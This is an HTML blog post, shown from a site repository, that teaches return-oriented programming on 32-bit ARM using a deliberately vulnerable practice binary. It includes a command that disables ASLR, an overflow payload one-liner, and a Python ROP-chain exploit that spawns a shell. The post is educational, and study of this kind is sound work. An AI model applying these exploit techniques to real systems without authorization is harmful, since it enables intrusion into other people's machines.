all repos — site @ c427363015ec0781ef15cc61d31696762f448606

source for my site, found at icyphox.sh

build/blog/rop-on-arm/index.html (view raw)

  1<!DOCTYPE html>
  2<html lang=en>
  3<link rel="stylesheet" href="/static/style.css" type="text/css">
  4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
  5<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico">
  6<meta name="description" content="Making stack-based exploitation great again!">
  7<meta name="viewport" content="initial-scale=1">
  8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  9<meta content="#021012" name="theme-color">
 10<meta name="HandheldFriendly" content="true">
 11<meta name="twitter:card" content="summary_large_image">
 12<meta name="twitter:site" content="@icyphox">
 13<meta name="twitter:title" content="Return Oriented Programming on ARM (32-bit)">
 14<meta name="twitter:description" content="Making stack-based exploitation great again!">
 15<meta name="twitter:image" content="/static/icyphox.png">
 16<meta property="og:title" content="Return Oriented Programming on ARM (32-bit)">
 17<meta property="og:type" content="website">
 18<meta property="og:description" content="Making stack-based exploitation great again!">
 19<meta property="og:url" content="https://icyphox.sh">
 20<meta property="og:image" content="/static/icyphox.png">
 21<html>
 22  <title>
 23    Return Oriented Programming on ARM (32-bit)
 24  </title>
 25<script src="//instant.page/1.1.0" type="module" integrity="sha384-EwBObn5QAxP8f09iemwAJljc+sU+eUXeL9vSBw1eNmVarwhKk2F9vBEpaN9rsrtp"></script>
 26<div class="container-text">
 27  <header class="header">
 28    
 29        <a href="/">home</a>
 30        <a href="/blog">blog</a>
 31        <a href="/reading">reading</a>
 32        <a href="https://twitter.com/icyphox">twitter</a>
 33        <a href="/about">about</a>
 34
 35  </header>
 36<body> 
 37   <div class="content">
 38    <div align="left">
 39      <p> 2019-06-06 </p>
 40      <h1> Return Oriented Programming on ARM (32-bit) </h1>
 41      <h2> Making stack-based exploitation great again! </h2>
 42      <p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
 43assembly to follow along. I highly recommend
 44<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
 45Basics</a>. Once you’re
 46comfortable with it, proceed with the next bit — environment setup.</p>
 47
 48<h3 id="setup">Setup</h3>
 49
 50<p>Since we’re working with the ARM architecture, there are two options to go
 51forth with: </p>
 52
 53<ol>
 54<li>Emulate — head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU. 
 55And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
 56The scripts found inside should be self-explanatory.</li>
 57<li>Use actual ARM hardware, like an RPi.</li>
 58</ol>
 59
 60<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
 61may use <code>radare2</code>, IDA or anything else, really. All of which can be
 62trivially installed.</p>
 63
 64<p>And for the sake of simplicity, disable ASLR:</p>
 65
 66<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> &gt; /proc/sys/kernel/randomize_va_space
 67</code></pre></div>
 68
 69<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
 70<a href="/static/files/roplevel2.c">roplevel2</a>. </p>
 71
 72<p>Compile it:</p>
 73
 74<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
 75</code></pre></div>
 76
 77<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
 78
 79<h3 id="a-primer-on-rop">A primer on ROP</h3>
 80
 81<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
 82used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code sigining</strong>.
 83In essence, no code in the binary is actually modified and the entire exploit
 84is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
 85
 86<p>A gadget is essentially a small sequence of code (instructions), ending with
 87a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
 88code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
 89These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
 90to form what’s called as a <strong>ropchain</strong>. At the end of a ropchain,
 91there’s generally a call to <code>system()</code>, to acheive code execution.</p>
 92
 93<p>In practice, the process of executing a ropchain is something like this:</p>
 94
 95<ul>
 96<li>confirm the existence of a stack-based buffer overflow</li>
 97<li>identify the offset at which the instruction pointer gets overwritten</li>
 98<li>locate the addresses of the gadgets you wish to use</li>
 99<li>craft your input keeping in mind the stack’s layout, and chain the addresses
100of your gadgets</li>
101</ul>
102
103<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=46&amp;t=0s">beautiful video</a> where he explains ROP using “weird machines”. 
104Check it out, it might be just what you needed for that “aha!” moment :)</p>
105
106<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
107that should put things into perspective.</p>
108
109<h3 id="exploring-our-binary">Exploring our binary</h3>
110
111<p>Start by running it, and entering any arbitrary string. On entering a fairly
112large string, say, “A” × 20, we
113see a segmentation fault occur.</p>
114
115<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
116
117<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
118
119<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
120
121<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and 
122<code>gadget</code>. Disassembling the <code>main</code> function:</p>
123
124<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
125
126<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
127to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are 
128never actually called.</p>
129
130<p>Disassembling the <code>gadget</code> function:</p>
131
132<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
133
134<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
135which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
136instruction in the middle. This is a <strong>gadget</strong>.</p>
137
138<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
139arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
140are used for this. So this gadget effectively allows us to pass arguments to
141functions using <code>r0</code>, and subsequently jumping to them by passing its address
142in <code>pc</code>. Neat.</p>
143
144<p>Moving on to the disassembly of the <code>winner</code> function:</p>
145
146<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
147
148<p>Here, we see a calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
149So our end goal here is to, quite obviously, execute code via the <code>system()</code>
150function.</p>
151
152<p>Now that we have an overview of what’s in the binary, let’s formulate a method
153of exploitation by messing around with inputs.</p>
154
155<h3 id="messing-around-with-inputs">Messing around with inputs :^)</h3>
156
157<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
158screenshot.</p>
159
160<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
161
162<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
163the <code>pc</code> has been overwritten with our input.
164So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>
165
166<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
167control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
168
169<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
170of the second instruction — <code>add r11, sp, #4</code>. 
171For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
172the address of <code>winner</code>. Note the endianness.</p>
173
174<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">&#39;print(&quot;AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00&quot;)&#39;</span> <span class="p">|</span> ./rop2
175</code></pre></div>
176
177<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
178
179<p>The reason we don’t jump to the first instruction is because we want to control the stack
180ourselves. If we allow <code>push {rll, lr}</code> (first instruction) to occur, the program will <code>pop</code>
181those out after <code>winner</code> is done executing and we will no longer control 
182where it jumps to.</p>
183
184<p>So that didn’t do much, just prints out a string “Nothing much here&#8230;”. 
185But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
186to do what we want (run a command, execute a shell, etc.).</p>
187
188<p>To do that, we’ll follow a multi-step process: </p>
189
190<ol>
191<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
192<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
193<code>r0</code>.</li>
194<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
195</ol>
196
197<p>The pseudo-code is something like this:</p>
198
199<pre><code>string = AAAABBBBCCCCDDDDEEEE
200gadget = # addr of gadget
201binsh  = # addr of /bin/sh
202system = # addr of system()
203
204print(string + gadget + binsh + system)
205</code></pre>
206
207<p>Clean and mean.</p>
208
209<h3 id="the-exploit">The exploit</h3>
210
211<p>To write the exploit, we’ll use Python and the absolute godsend of a library — <code>struct</code>.
212It allows us to pack the bytes of addresses to the endianness of our choice.
213It probably does a lot more, but who cares.</p>
214
215<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
216at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>
217
218<pre><code>(gdb) find &amp;system, +9999999, "/bin/sh"
219</code></pre>
220
221<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
222
223<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
224found from the disassmblies from earlier. Here’s the final exploit code:</p>
225
226<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
227
228<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
229<span class="n">string</span> <span class="o">=</span> <span class="s2">&quot;AAAABBBBCCCCDDDDEEEE&quot;</span>
230<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
231<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
232
233<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
234</code></pre></div>
235
236<p>Honestly, not too far off from our pseudo-code :)</p>
237
238<p>Let’s see it in action:</p>
239
240<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
241
242<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
243when the pipe closes, since there’s no input coming in from STDIN.
244To get around this, we use <code>cat(1)</code> which allows us to relay input through it
245to the shell. Nifty trick.</p>
246
247<h3 id="conclusion">Conclusion</h3>
248
249<p>This was a fairly basic challenge, with everything laid out conveniently. 
250Actual ropchaining is a little more involved, with a lot more gadgets to be chained
251to acheive code execution.</p>
252
253<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
254 
255    </div>
256    <hr />
257    <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:x@icyphox.sh">x@icyphox.sh</a>.</p>
258    <footer>
259      <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
260        <img src="https://licensebuttons.net/l/by-nc-sa/4.0/80x15.png">
261        </a>
262    </footer>
263  </body>
264  </div>
265 </html>